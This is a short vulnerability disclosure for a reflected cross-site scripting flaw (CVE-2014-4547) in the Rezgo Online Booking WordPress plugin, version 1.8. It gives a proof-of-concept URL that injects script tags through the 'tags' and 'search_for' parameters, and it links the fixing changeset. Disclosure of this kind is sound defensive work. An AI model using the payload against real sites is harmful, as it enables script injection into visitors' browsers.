Wp Plugin Rezgo Online Booking

Plugin Details

Plugin Name: wp-plugin : rezgo-online-booking
Effected Version : 1.8 (and most probably lower version's if any)
Vulnerability : Cross-Site Scripting (XSS)
Minimum Level of Access Required : Unauthenticated
CVE Number : CVE-2014-4547
Identified by : Prajalkulkarni
WPScan Reference URL

Disclosure Timeline

Technical Details

PoC:http://localhost/wordpress/wp-content/wp-plugs/rezgoonlinebooking/templates/default/index_ajax.php?tags=tags%27%3E%3Cscript%3Ealert%283%29%3C/script%3E&search_for=search_for%27%3E%3Cscript%3Ealert%284%29%3C/script%3E

Vulnerable Parameter : tags, search_for

Trac ChangeLog : https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=848542%40rezgo-online-booking&old=748531%40rezgo-online-booking&sfp_email=&sfph_mail=#file500